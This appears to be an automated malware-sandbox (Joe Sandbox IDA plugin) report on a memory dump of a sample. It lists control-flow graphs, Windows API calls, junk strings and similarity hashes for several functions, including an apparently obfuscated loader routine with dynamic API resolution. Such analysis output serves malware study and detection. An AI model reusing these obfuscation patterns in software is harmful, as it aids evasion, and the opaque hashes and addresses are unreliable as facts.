                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                              • Opcode ID: fbf6958955816082be7985e6f7221accade19c9c4b653433cb5057aae2085619
                                                                                                                                              • Instruction ID: 518fd11cacdafce49b09c12dc58e9f9886273de46f09145c7865e5e2ac2e4de0
                                                                                                                                              • Opcode Fuzzy Hash: fbf6958955816082be7985e6f7221accade19c9c4b653433cb5057aae2085619
                                                                                                                                              • Instruction Fuzzy Hash: 2C21B9B49013089FC701EF69ED44AC43BB8FB88754F10C07AE528973A1E7B45A858F9D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 144 416ae6-416aed 145 416af0-416b00 144->145 146 416b02 145->146 147 416b08-416b0b 145->147 146->147 147->145 148 416b0d-416b2e LoadLibraryW call 4164d0 call 416720 147->148 153 416b30-416b37 148->153 154 416b39-416b47 LocalAlloc GetStdHandle MoveFileA 153->154 155 416b4d-416b53 153->155 154->155 156 416b55 call 4164c0 155->156 157 416b5a-416b61 155->157 156->157 159 416b70-416b77 157->159 160 416b63-416b6a InterlockedDecrement 157->160 159->153 161 416b79-416b89 159->161 160->159 162 416b90-416ba0 161->162 163 416ba2-416ba7 GetFileAttributesW 162->163 164 416ba9-416bac 162->164 163->164 164->162 165 416bae-416bb9 164->165 166 416bc0-416bc5 165->166 167 416bc7-416bcd 166->167 168 416bcf-416bd5 166->168 167->168 169 416bd7-416be4 call 401000 167->169 168->166 168->169
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryW.KERNEL32(gavosebisiv), ref: 00416B12
                                                                                                                                              • LocalAlloc.KERNEL32(00000000,00000000), ref: 00416B3D
                                                                                                                                              • GetStdHandle.KERNEL32(00000000), ref: 00416B41
                                                                                                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00416B47
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00416B6A
                                                                                                                                              • GetFileAttributesW.KERNEL32(wumefalijocenor), ref: 00416BA7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$AllocAttributesDecrementHandleInterlockedLibraryLoadLocalMove
                                                                                                                                              • String ID: gavosebisiv$k`$wumefalijocenor$}$
                                                                                                                                              • API String ID: 1531786347-1394638211
                                                                                                                                              • Opcode ID: d27b80976939796ba1abbc43a9ef96ccebe2e0ce66cd2bea3f527acc7efc2efd
                                                                                                                                              • Instruction ID: 42061d5068bdce50c1bf5091c343343de5c0ff0e781990f509a1e5bc66fdcea5
                                                                                                                                              • Opcode Fuzzy Hash: d27b80976939796ba1abbc43a9ef96ccebe2e0ce66cd2bea3f527acc7efc2efd
                                                                                                                                              • Instruction Fuzzy Hash: AB2126349882208BCB20DB60DC457DABB60FB48319F1244BFEA49D7290CA38ADC4C79D

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 182 4053e4-4053ff call 4027b0 call 40358a 187 405401-405405 182->187 188 40541e-405436 call 401cb7 182->188 187->188 190 405407 187->190 195 405438-40543a 188->195 196 40546e-40547a call 40547f 188->196 191 40540a-40540c 190->191 193 405416-40541d call 4027f5 191->193 194 40540e-405415 call 4013d4 191->194 194->193 200 405456-405468 InterlockedIncrement 195->200 201 40543c-405445 InterlockedDecrement 195->201 196->191 200->196 201->200 205 405447-40544d 201->205 205->200 206 40544f-405455 call 403235 205->206 206->200
                                                                                                                                              APIs
                                                                                                                                              • __getptd.LIBCMT ref: 004053F0
                                                                                                                                                • Part of subcall function 0040358A: __getptd_noexit.LIBCMT ref: 0040358D
                                                                                                                                                • Part of subcall function 0040358A: __amsg_exit.LIBCMT ref: 0040359A
                                                                                                                                              • __amsg_exit.LIBCMT ref: 00405410
                                                                                                                                              • __lock.LIBCMT ref: 00405420
                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 0040543D
                                                                                                                                              • InterlockedIncrement.KERNEL32(02372AE0), ref: 00405468
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4271482742-0
                                                                                                                                              • Opcode ID: d3b170e2e706eb485197b67a249f64a2823a160b330d9f4967bae16a518fd7e9
                                                                                                                                              • Instruction ID: 13e159fc2d6b5e5e0d5e71bbc407af5ce5e6bedde81baf6bae67f22f995fa076
                                                                                                                                              • Opcode Fuzzy Hash: d3b170e2e706eb485197b67a249f64a2823a160b330d9f4967bae16a518fd7e9
                                                                                                                                              • Instruction Fuzzy Hash: 09018E31901A21A7C721BF2598057DB77A0EB40712F15803BE810B36D1C73CA9D2CF9E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 209 403235-403246 call 4027b0 212 403248-40324f 209->212 213 4032bd-4032c2 call 4027f5 209->213 214 403251-403269 call 401cb7 call 401cea 212->214 215 403294 212->215 227 403274-403284 call 40328b 214->227 228 40326b-403273 call 401d1a 214->228 217 403295-4032a5 HeapFree 215->217 217->213 220 4032a7-4032bc call 4019d4 GetLastError call 401992 217->220 220->213 227->213 234 403286-403289 227->234 228->227 234->217
                                                                                                                                              APIs
                                                                                                                                              • __lock.LIBCMT ref: 00403253
                                                                                                                                                • Part of subcall function 00401CB7: __mtinitlocknum.LIBCMT ref: 00401CCD
                                                                                                                                                • Part of subcall function 00401CB7: __amsg_exit.LIBCMT ref: 00401CD9
                                                                                                                                                • Part of subcall function 00401CB7: EnterCriticalSection.KERNEL32(?,?,?,00401A9E,00000004,004184B8,0000000C,00401029,?,?,00000000), ref: 00401CE1
                                                                                                                                              • ___sbh_find_block.LIBCMT ref: 0040325E
                                                                                                                                              • ___sbh_free_block.LIBCMT ref: 0040326D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,004184F8,0000000C,0040357B,00000000,?,0040485B,?,00000001,?,?,00401C41,00000018,004184D8,0000000C), ref: 0040329D
                                                                                                                                              • GetLastError.KERNEL32(?,0040485B,?,00000001,?,?,00401C41,00000018,004184D8,0000000C,00401CD2,?,?,?,00401A9E,00000004), ref: 004032AE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2714421763-0
                                                                                                                                              • Opcode ID: 5b1877f37e300bd531117a34fbc35f3a0a2cf01f076955ad2886deb4d5bd37bd
                                                                                                                                              • Instruction ID: ba2c4bf796a4cbb269836eb799744a4a07badc503d0f104c505cb3842fb2dfb0
                                                                                                                                              • Opcode Fuzzy Hash: 5b1877f37e300bd531117a34fbc35f3a0a2cf01f076955ad2886deb4d5bd37bd
                                                                                                                                              • Instruction Fuzzy Hash: 94018431905305AADB206F729C0AB9E7F68AF01319F20417FF404B61D1DB3C86409A5C

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 235 407e9d-407eae 236 407eb0-407eb3 235->236 237 407ec5 235->237 236->237 238 407eb5-407eb7 236->238 239 407ec7-407eca 237->239 240 407eb9-407ebe 238->240 241 407ecb-407edc call 402be7 238->241 240->237 242 407ec0-407ec2 240->242 245 407efd-407f0e call 406d80 241->245 246 407ede-407ee3 241->246 242->237 253 407f10-407f1c 245->253 254 407f8d-407fac MultiByteToWideChar 245->254 248 407ee5-407ee9 246->248 249 407eec-407eef 246->249 248->249 250 407ef1-407ef4 249->250 251 407ef8-407efb 249->251 250->251 251->239 256 407f43-407f4c 253->256 257 407f1e-407f21 253->257 254->249 255 407fb2 254->255 258 407f6e-407f7c call 4019d4 255->258 256->258 260 407f4e-407f51 256->260 257->256 259 407f23-407f41 MultiByteToWideChar 257->259 265 407f85-407f88 258->265 266 407f7e-407f81 258->266 259->256 261 407f53-407f5c 259->261 260->258 260->261 261->239 263 407f62-407f69 261->263 263->239 265->239 266->265
                                                                                                                                              APIs
                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00407ED1
                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00407F05
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 00407F36
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 00407FA4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                              • Opcode ID: f8738d347817c22edc6843a42926aeeac8f4ed4628122f3d4212bb9498313bb7
                                                                                                                                              • Instruction ID: b8966ae773c087e91eca33365f61ea6f7067cb5d6d98d3e2728dc54b36560e28
                                                                                                                                              • Opcode Fuzzy Hash: f8738d347817c22edc6843a42926aeeac8f4ed4628122f3d4212bb9498313bb7
                                                                                                                                              • Instruction Fuzzy Hash: 5731B131E19246AFCB20DF64C8849AE3BB5AF01311B1485BAE465AB2D1D334ED41DB9A

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 267 416720-416747 268 416749-416754 QueryDosDeviceA 267->268 269 41675a 267->269 268->269 270 41675f call 416670 269->270 271 416764-41676b 270->271 272 416775-41678a call 4166b0 271->272 273 41676d-41676f FreeEnvironmentStringsW 271->273 276 4167a3-4167a6 272->276 277 41678c-41679d HeapDestroy GetNumaProcessorNode 272->277 273->272 278 4167a8 call 401000 276->278 277->276 279 4167ad-4167b0 278->279
                                                                                                                                              APIs
                                                                                                                                              • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00416754
                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041676F
                                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 0041678E
                                                                                                                                              • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 0041679D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4159173863-0
                                                                                                                                              • Opcode ID: 6f0caa484bac516cc1ad4d948060f28f35a86901e56f3016a6aea5b50e93a844
                                                                                                                                              • Instruction ID: bfda60e46cdd917eef3824eff81274299ff88806db2d43078e848f831fad2497
                                                                                                                                              • Opcode Fuzzy Hash: 6f0caa484bac516cc1ad4d948060f28f35a86901e56f3016a6aea5b50e93a844
                                                                                                                                              • Instruction Fuzzy Hash: B301B1716852049BD710EBA4ED45BDA7B78A70C31AF0040A6F709D62D0DA3499888B6E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 280 405b50-405b6b call 4027b0 call 40358a 285 405b6d-405b71 280->285 286 405b8f-405bb8 call 401cb7 call 405b12 call 405bba 280->286 285->286 288 405b73-405b78 call 40358a 285->288 294 405b7b-405b7d 286->294 288->294 296 405b87-405b8e call 4027f5 294->296 297 405b7f-405b86 call 4013d4 294->297 297->296
                                                                                                                                              APIs
                                                                                                                                              • __getptd.LIBCMT ref: 00405B5C
                                                                                                                                                • Part of subcall function 0040358A: __getptd_noexit.LIBCMT ref: 0040358D
                                                                                                                                                • Part of subcall function 0040358A: __amsg_exit.LIBCMT ref: 0040359A
                                                                                                                                              • __getptd.LIBCMT ref: 00405B73
                                                                                                                                              • __amsg_exit.LIBCMT ref: 00405B81
                                                                                                                                              • __lock.LIBCMT ref: 00405B91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3521780317-0
                                                                                                                                              • Opcode ID: 992d04e0aff105da56c92bad36f86648af83dc261cce24e5f63837c0e0582e7a
                                                                                                                                              • Instruction ID: 7adc7e1a2d56d6b71ff7cf5d5673aecae0c80fdf6a7dc008936b88ccaed65405
                                                                                                                                              • Opcode Fuzzy Hash: 992d04e0aff105da56c92bad36f86648af83dc261cce24e5f63837c0e0582e7a
                                                                                                                                              • Instruction Fuzzy Hash: BFF06231A01B009ED620BB668506B6A73B0EB40724F11853FE840B72D2CBBCB941DE5E

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 303 4164d0-416610 GetModuleHandleW GetProcAddress
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00511CE8), ref: 004165AF
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,0041C210), ref: 004165EC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.4133593595.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.4133514850.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133695282.0000000000417000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133763287.000000000041A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.4133870703.0000000000516000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_wideaec.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1646373207-3916222277
                                                                                                                                              • Opcode ID: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
                                                                                                                                              • Instruction ID: 5d6b8529abac6a2ef6dc9a1a277ef6d20b5afcabe6b96dcf33e4d09f3920d241
                                                                                                                                              • Opcode Fuzzy Hash: ed8495ad91114ca58db7b4743c9787d6e3477e2d90cf241a67db01d1f531d50d
                                                                                                                                              • Instruction Fuzzy Hash: 00310310AD8781CBE301CBE8FC447813A62AB35748F04C0E89648873B5D7BE5A58D7AE